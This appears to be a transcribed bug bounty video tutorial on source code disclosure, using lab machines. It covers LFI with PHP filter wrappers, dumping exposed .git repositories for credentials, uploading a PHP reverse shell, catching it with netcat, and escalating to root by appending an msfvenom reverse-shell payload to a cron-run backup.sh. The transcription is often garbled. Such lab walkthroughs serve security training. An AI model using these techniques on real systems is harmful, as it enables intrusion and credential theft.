So guys, now we are going to discussing about source code disclosure vulnerability. So source code vulnerability. Source code disclosure vulnerability occurs when an attacker is able to access a raw source code, a web application, script, or a server-side logic after due to a misconfiguration or increase a code handling. So why it's critical in bug bounty? So it will reveal hard-coded credentials like API keys or secret keys, otherwise passwords or some other things, and expose a business logic flaws, authentication mechanism or vulnerable libraries, lead a remote code or SQL injection, help attacker to create a precise exploits with this. Now, let's we would like to look here like when you go for a misconfigurations in this. So in this we can see like when you go here as a HTTPS. Now let's you can consider like a target.com. Then you can put like a index.php as a backup. So where we have seen in the previous server-side request forgery. This is like misconfiguration like a web service where you can understand everything. Now, when you go for like a backup or a temporary file list in the public, it's quite dangerous. Like they put like a backup or zip file or tar.gz like this like a compression of the files like old, otherwise swp or txt or xyz things. Okay, now the vcc expose like a git or svr mercurial. So if the git is exposed like you have like let you can consider like let's you can consider you have posted everything and that you have program also in the github. Okay, and you have write everything in the github program like index.php that is with the python vercel and all these things. Now if you have a target like let's you can consider you have like uh, let's you can consider your let me I can put like uh, backup.com /git. So this will leads uh, to exploit this one very easy way to access this one where you can get user credentials, login, and the server exposes all the informations with this with the Git. You can utilize a Git dumper and dump everything like unintended debug error. uh, in the debug error like a stack traces that dump a partial code and developer error message exposing a logic. uh, uh, Local file inclusion with a php wrapper also we can get like I already told you before in previous tutorial. With local file inclusion we can also do a php filter to convert like base64 or encode with a resource equal to next.php. Now we are going to testing all these things. We would like to test this all these things. Now let's come back. Now we would like to move to here. Now I have posted one is available with here my target IP address, another one is here this two. So I have posted for all these things. Now let me would like to try here 155. Let's we would like to look here. Let's let me we would like to look here. This is a PWN lab. Now we would like to look here. So we have a website. Uh, everything. We would like to look here. Where we would like to look here, port 80 is open and 111. Where we can got here one is with the MySQL. That's it. Apart from there is nothing else. Okay. Now we would like to look here as a local file inclusion. We would like to do here let's come back here. Now first of all, let's come back here. Let me just type here as clear. Now I would like to go with the directory master 155. That's it. We would like to go back here. We would like to look here. What is useful information we can get here? We would like to try to open a images, PWN lab image. That's it. Apart from nothing else from here, where you try here as a login, you just need to enter the login like a test. Then test, try to log in here. Where I have got here question mark page equal to a login here. That's it. Apart from here, we didn't get anything else. Okay. And where in the login place, if you try to go for as upload, it will try to come. You must and should be a login here. Now we would like to try to give here as a PHP filter. We would like to try here as a PHP filter. Now we can look here how to write a PHP filters. Now we would like to look here as a PHP filters as a convert base 64. We would like to look here. Now you can look here a PHP converts. How we would like to look at this. Now in this case, if not get the right thing, seems to get a manual. So I would like to write here as exactly. I just put here as a PHP. Then I would like to put here as a filter convert dot base 64. I would like to get like a encode the data, and we just put here as a resource equal to you would like to get the config file. Where you can look here, I have got it here the entire of the config file. Where you just need to note down this one. This you can get it directly in the public domain. So you just need to search this one. So just copy this one. Let's come back here. Now you can decode. Either you can use a cyber chef, otherwise let's come back here. You would like to use a cyber chef, it's up to you. Either you have capability to do it manually, just put here as echo, then I just paste here, then just put here as base 64 as decode. Okay, sorry, echo. I just paste this. I would like to go back. Then we would like to try to decode here. Where you can look here, exactly you can get it here. Username is root, password, and database is user. Now even if you try with the cyber chef, I would like to put here as from base 64. Let's just paste this. Exactly you can receive the same thing. You no need to worry. Let's come back here. Now you need to identify here utilizing this one. You need to try to connect it to the database. Now you would like to try here where we don't have a SSH, we have only the MySQL. That's it. Now if you want to try, you can put here as port also. This will take more lengthy time process. Now we would like to try to connect here MySQL host for enter or targeted IP address 192.168.80.115. This one is 115. That's it. Then username is root, database name is users, and password. You need to enter this password. Just copy. Let's just paste. So you have received this one. Uh, Received an error packet with the before completion of TLS handshake. So I would like to try to look in the MySQL. I think I have some issues. Let's come back here. So sometimes we can get error of this one. We would like to try to do this. Now, you just put here as a sudo su, enter your password. Now, you just put here as cd as etc, as go to here as MySQL, config.t. Now just type here as +-l. Now, where you have this, so just copy, just type here as nano, MySQL config. Where I just put here as MySQL, and I just need to put here as a SL equal to a 0. That's it. It's quite interesting way. Now let's come back here. Close this. Now just type it as exit. Now you just try here one more time. Let's just copy, come back and paste it. So too many errors, unblock with the MySQL admin or flush the hostess. So why this one? Let's we would like to try this. So sometimes it may can give a lot of errors. We just need to overcome with this type of errors. Okay, I would like to try here as a underroot. I just copy sudo su. I just paste this and the password. So that's it. It's quite interesting way. So how we would like to try to solve this? So it may take more and lengthy time process. So in our case, we have identified. We just come back here. Where is this? Come back. So where we have identified with the what we would like to say. This one. Let's we would like to we have identified the uh, let's we would like to identify with the local file inclusion plus a PHP wrapper. So this we have identified. Let's how we would like to give on that command. Let's we just I would like to enter with the targeted domain HTTP enter what targeted IP address 192.168.18.11 there. Then you just put here as page equal to so page equal to you just put here as a PHP, then you just type here as a filter, then you just put here as a convert dot page 64 encode, then you just put here as a resource equal to config. That's it. That's it. Anything. That's it we have got here. So in the config, even you can try here as let me. I would like to go here as a terminal. Let me. I would like to look here as let me. It's not work out. Let me. I would like to try the main thing as CMD. Let me. I would like to run as a administrator. Then let me just try here as S. We just put here as MySQL. MySQL is not recognized, so I don't have a MySQL to run here. So I can't able to run right now this SQL. So it may can give, but why it's giving as error, we prefer not to say. Let's we would like to try. We would like to try this. So let me just so it was stuck. Like I can refresh this. So that's it here. So now let's wait for this. Let it come. Let's come back here. So that is closed. This is let me I just power off. Now let it open. Now we would like to try to power on. Now we would like to try to do as another one. So in this another one, what you can get here. We would like to look here. Let it start this one. Now, while sitting for solving that one, this will take a long and lengthy time process also. Now, we would like to go back here, add this. Let's go back. So this is MySQL. Let's show variables like error. So okay, now let's come back. Let me just close this. Now we have completed this one, but I don't like to go as much more as in depth. Just put here as sudo su, enter your password. Let's just put here as -i. Let's come back. Let's just put here as serious bug bounty. Let me just type clear. You just put here as list. Now, let me just quit here. We just put here as 156. Now, we would like to dive into as another one. Okay. Now, we would like to try to test how the source code will be disclosure, like git, otherwise config file, otherwise index.php files, where we have everything this one. Now, we would like to go and look this one. Now, where you can look here with the targeted IP address with the port 80 with a git, it is found automatically, and git repository is found here. Now, it shows here in the targeted place like block under constructions. Okay, I would like to close this and this. Now, once you just type here as a .git, you can look here, it was a forbidden. It was a forbidden here for us. So how we would like to try to access this one. So I would like to go here. It was a forbidden, but it was found in the git nmap result. Now we would like to go with the directory master. Then you just here as stb and your target IP address is 156. That's it. Where you have got it with the head admin.php. It's quite interesting thing. So just copy, come back. Let me just open this. Let's just paste. Where we have the username is admin and password is password. Let's just try a normal thing. Run username and credentials. So we have our git, but we cannot able to access that one. So how we would like to utilize this one? You can look here, but we can get a robust.txt or xyz things. Even if you go for as upload, so only the two interesting things we have got here is it was a forbidden. Okay, let's close this. Now, in this case, we would like to go here as git tools, GitHub. We would like to utilize a repository with the git tool. So entirely just copy this one, come back here, you just type it as clear, you just type it as git clone and paste this repository. That's it. Now go to here as a git tools. Now just type +-f. Now you have find here everything. Now where we would like to go here as a dumper. Let's just go here as a dumper first. Then you just type here as +-f. So where we have got here as a git dumper.sh. Now let's just put here as git dumper.sh, your targeted URL of the GitHub. Let's come back here. So this is a header of your targeted URL of the GitHub. This is a GitHub. Now I just put here as a destination to a directory. That's it. Now it will start for extracting and it's dumping all these things. So where the git files are like description, config, commit editing, index files, referrals, logs, log referrals, everything we have got here. So quite interesting things. Now that we have successfully dumped the git files using everything. Now what is our next tab? We would like to go to back here. Now we just look here, +-f. We have extractor. We just need to go to this extractor. Just copy, come back. Now we just type +-f here. Now I just type here as a extractor .sh. Now let's just put here as dumper. Now Where I would like to utilize this, the directory is a destination directory. This is the same thing you just need to mention. So destination directory, that's it. Then from this destination directory to a destination directory to execute all these things to extract. This extractor tool will create a directories based on the commits on the git that will dump earlier, which can be observed in the given these objects. Okay, we can traverse after that everything. Now you can look here. All this is found everything in the directories. Now, which is everything is clear. Now, now you just look here as ls minus here, where I have destination directory. Just copy. Let's we just go here as destination directory. Now just type here as ls minus here. Now we would like to look the first one. Okay. Now first one. Otherwise, we would like to look here. So I would like to look any other one. So I would like to look this number one. We would like to go to this directory. Now just type plus minus L. Now you just look here as cat a admin.php. In the admin.php is pass folder everything. Let's scroll up. You can look here. Username is admin. Password is this one. How long it will. So we have got it here. We would like to just copy username. Where is this? Admin. Here, password is this one. Exactly. So we just copy. Come back here. This one. Let's just press right. Then try to log. Where you can look here, you have successfully logged in here into the directory of the post. You can post anything else, what else you like, and it's under construction only. That's it. So once you have come here, you can write anything else. Let's write here pentester club. Body is hello, how are you? I would like to put, if you want to get a reverse shell, let's just go back here. Now, I would like to, where is this, bug bounty, reverse shell.php. That's it. Now, try to upload it. You have successfully uploaded the file. That's it. Now, let's come back here. In this case, now, I would like to open in the new tab. I would like to go to here until I would like to make it as a little bit big. Now let me just type it as clear. Just type this one's here. Now just clear as cat rshell.php. What's the port? Port is 1234. That's it. Let me just clear as netcat minus lvnp 1234. Now, what is this? Admin.php. Now, we would like to go for as uploads. Upload.php. Uploads.php. It's not found. We would like to try as a directory buster with one more time. We would like to look here. Admin.php. There, what's the right resource we can get here? Index.php. only upload. Let me just copy, come back. Let's just open this here. It was a formula. Now let's just put here as a rshell.php. Now, where you can look here, you have a successfully get a connection here. You can look here, you can enumerate more what else you like. You can go more in depth here. That's it. Like you just type here as a which Python you didn't get a, again you just type here as which Python 3. So any type of targeted website, that's it here. Similarly, however you can practice the CDF, that's it. You can take over enter of the targeted website. Now just type bin bash. Now just type +-l. Go to here as a cd as home directory. Just put here as a export tab equal to extra. Let me just type it as clear. Just put here as +-l. Eric +-l. Just put here as cat a flag.txt. That's it. Where it was a given, just remember. That's it. So where there is a backup.zip, sudo as admin.successful. So it's quite easy way to do this one. Let me, I can do this one. Let me, I would like to type here as cd as a bug bounty. Let me just type here as a clear. I just type here as +-l. Here a shell.php, which I already have a PHP shell. I think I don't want this shell.php. Now, we would like to look here as a cat backup.sh, where this is quite interesting thing. Cat a backup.sh, quite interesting thing. Let me just come back here. You just put here as msfvina, payload for a cmd, or let me just put here as Unix reverse underscore a bash. Now let's just put here as lhost equal to 192.168.18.112 and lport equal to 7890. That's quite interesting. Then you just put here as just a run. That's it. So where you can get this entire of the RAP, we would like to wait a little bit some time. In this case, you just need to put here. Let's just put here as a echo. Then let's come back. You just need to copy only this one. Just copy. Let's just paste it. Then put here as a backup.sh. That's it. Now let's come back here. You just put here as netcat minus lvnp 7890. Let's just put here as a cat a backup.sh, where this is exploit is there. Now we would like to look here. Left. When you run this a backup.file, I would like to try to, yes, it was connected already. You can look here, already root. cd as root, +-l, where we have got here, cat a flag.txt, where you have got here, quite interesting way. It's quite very easy way to perform this one. That's it. Now, we have performed very quite easy way of this one. We have finished this one also. Now the last one is 156 is over, 156 over. This is 157 now. Let me just close this. Now, this 157 is also the same way. Let me just put this. Now let's come back. 157. We would like to look here. What's the interesting thing here in 157? We would like to try to look. Now, here also 157 port 22 and port 8. It's available. It's the same thing. Now, where it was written here wp gitroot dot 1. So just copy gitroot dot 1. This is the I would like to try to copy this one. Let's come back here. Just put here as nano as a etc hostess. Come back. You just enter your target IP as 192.168.18.157 gitroot.1. That's it. Just copy and paste. Now go back. Come back here. Here's clear as HTTP. Hey Jim, now it was quite interesting way. Now let me just come back here. In this case, let me just type it as clear. You would like to go with the directory buster. I would like to go here with the HTTP. That's it. In this case, what we would like to try to find here. Let's go for running this. So in this case, we are not getting any useful information. Now we would like to look here where we have here a wp gitroot dot 1. So I think we have a virtual host here. Let me just close this. So I would like to use a gobuster. You just put here as minus help. I think we have done with our directory. Now we would like to utilize as a virtual host. This uses for virtual host enumeration. You most probably want to use the IP address and URL of the parameter. Okay. Let me just utilize this. Let me just type it as clear. The gobuster virtual host. Then in the virtual host, what we would like to try here as let's come back, copy, come back, let's just press. Oh, sorry, I would like to put for the URL is then this one is wordless is user share wordless. Then you just put it as directory master, then directory list 2.3 medium.txt. That's it. Which is like a finding. The status code is heavy here. So how you would like to try to reform? So this may take more and lengthy time process. Let me. Now I just copy, come back here, put this. Let me just write here. Just write plus minus here. So I would like to use. Okay, now I would like to use another directory list. So just copy, come back. With big.txt, that's it. Now let's we would like to try to find here. In this case, it may take very less time. We would like to look here. So in this case, I didn't find anything else. Now let's I would like to try here as another thing. So we don't need to worry for this virtual host where we already have this WP virtual host. So just copy, you just come back here, you just go with the nano hostess, come back. Let me just paste this, then type Control O, Control X. Now let's let me just type it as clear. You just clear as cat as etc hostess. We just need to just copy, come back here. Now, I would like to try to here as HTTP. Let me just paste this. There, we have got this as a WP admin. Now, I would like to try here. Very quite an interesting way. Otherwise, we can go Bovastra as a virtual host minus U is HTTP as a git root, user share, wordless as big, then where grep 200 only. Okay, I think I have tried. Uh, Govastra, virtual host minus u. I would like to put here as a git root dot one wordless use user share wordless, then directory Govastra big dot txt. Then in this case grep 200. Now we would like to look here. What's the results we have got here? So it may take also a lengthy time process. So we need to find the .github, the repositories of this target website. Even if you want to try as a WP scan, you can try with as a WP scan of this target website. You can look here. Let me just type here as a clear. Just clear as WP scan minus URL. Just paste it. Enumerate the users and plugins. That's it. Not validate. Okay. found 20465. So why it was not finding here, but we would like to try as in this case I would like to try to put here. We would like to go back here, just copy, just clear as none, etc as posters, repo dot git root dot one, just copy and paste it. That's it. Now what we would like to try here is we would like to clear as a cat as etc posters, repo git root dot one, just copy this one, come back, we just try here as http, then let's just paste it here. We can look here, welcome to our code storage area. We are currently storing a bunch of codes here. Feel free to search our code base at get.php and set a code.set.php. It's quite interesting way. We already have this git dumper. Now let's we would like to go here as come back. Let me just write it as clear. Now first of all, we would like to try with as directory buster, http. Then let me just paste this. What I already got it here is with the git dot head. Quite interesting way to get it here. Let's we would like to look here. Reference with the head dot master. Quite interesting way here. Now what we would like to try here. Now let's come back. Let's close this. Now we just go here as a git tools. Let me just type here as clear. Just type this minus l dumper. In the dumper, we just put here as a git dumper.sh. Now we need to write a destination folder here, and what is the let's come back, just copy, come back here, let's just paste here. Now in this case, once you have done, you just put here as git root git tab. That's it. Now let's all these things which was created with as a git root, permission is denied. Let me just put here as sudo su, enter your password. Now just type plus minus here. Okay. Let entirely we just take this copy. Let me just type it as clear. Let me just paste it here. Now which is going for a creative, so which is everything is created now. Where you can look here, download like a commit edits, you can look here everything. Let's you can delete this head, you can look here where a new file.txt. In this case we just need to get our this thing. Okay, now we just need to just copy, come back here, you just put here as http repo.github as vulnerable. You can look here Pablo secret password. I would like to make it as a little bit big far where we have got this the passwords. Quite interesting. Now we have got it here. Now we would like to try to go for as a extraction. Now come back here, cd. Now We just put here as extractor. Now just type plus minus L. Now just put here as a extractor dot sh. In this case, so let's we would like to look here as hi. So in this case, let's we would like to go to here as an extractor plus minus L. So here a quite interesting way to get now. Let's creating a directory. Let me just look here. Locate this directory. This one's here. So this is quite a different way. Now, let me. I think I have made a mistake. Let's git dumper.sh. So let's we would like to try here. I would like to try only as oh yeah this means here cd as dumper this means here. Okay. In this case, we didn't have anything else. Git dumper.sh as a temp. Now let's we would like to look here. Now just type this minus here. Now I have here as a git temporary. Now with a git temporary, you can try to extract the files also. Now let's we would like to look here as cd as a git temporary. Now just type plus minus here cd dot a git. Now just type plus minus here. Now in this case, we not have done anything else from here. Let's even if you look like get a config false. Okay. cd as a logs. Now just type plus minus here cd as referrals plus minus here. So this is not the right way. Let's go back here. Now let's just clear cd as come to here as a extractor. Now in the extractor place, you can utilize a this one is F. Otherwise I just put here as a exit. I just put here as extractor. as dumper. Dumper okay, I would like to do here as something quite interesting way. Plus minus a. Now let's go back. See here as a extractor. Now just put here as a extractor. Now just try plus minus here. Now let's just put here as a extractor. Here, I would like to put here. This I just need to change. That's it. So git tab that. Let's just put here. So I just put here as git tab. It's quite easy now. Git tab. That's it. Now it will try to extract uh, so we need to extract with this. So I try to extract with this. So in this case, we are trying to fail this one, extractor. In the case of a commit, where is this? For storage. My block agent. Pablo help.txt. Let's just copy. We would like to look here. HTTP Pablo help.txt. It's not found. So that's it. So anyhow, we are trying to getting out. Sometimes we cannot able to get here. So it's quite different. When you try here as a another thing, we try to get here, but we have got the username and the password. So even you can try here like if you try here like I can try it another way. I just put here as a git dumper Python. I would like to get here as a Python tool. This is quite interesting way here. Okay, just copy, come back here. One tool as another tool. It's quite interesting way. We can try with this thing. Git clone and paste this repository. Git dumper. You just type it as a git dumper. Now just type plus minus a. You just put here as source virtual environment. You just type it as pip3 install minus a requirements.txt. I just copy this one. Let me just type it as clear. You just type it as Python 3 git dumper.python. Now the main thing is let's just copy, come back. Where is this? For storage. This one, just copy, come back. Let's just paste it. That's it. Now, we have got entirely here. Now, you can look here on status code 404, 200, all the objects where you can get all the information from here. Now I can type Erasmus minus here. You can get from all the details from here. You can look here fetching all the information. You can open. You can get all the information. So it's with not with the txt file. You can try to read here all the informations. You can look here cd.get. I just write it as clear plus minus f, where you can look here a config oops referrals or with the logs. Now where you can get here you need to look uh, objects. So you just need to find all from here. So info or pack, which one we prefer not to say. This will try to take a long lengthy time process. That's it. So this is how you can perform the source code vulnerability. So there is many other things, not only this one, like env with the AWS, Amazon, backup, hold, and many other things you can find with the engineers, all these things. So this is how you can perform. Now, later we would like to try as a SQL injection. That's it here.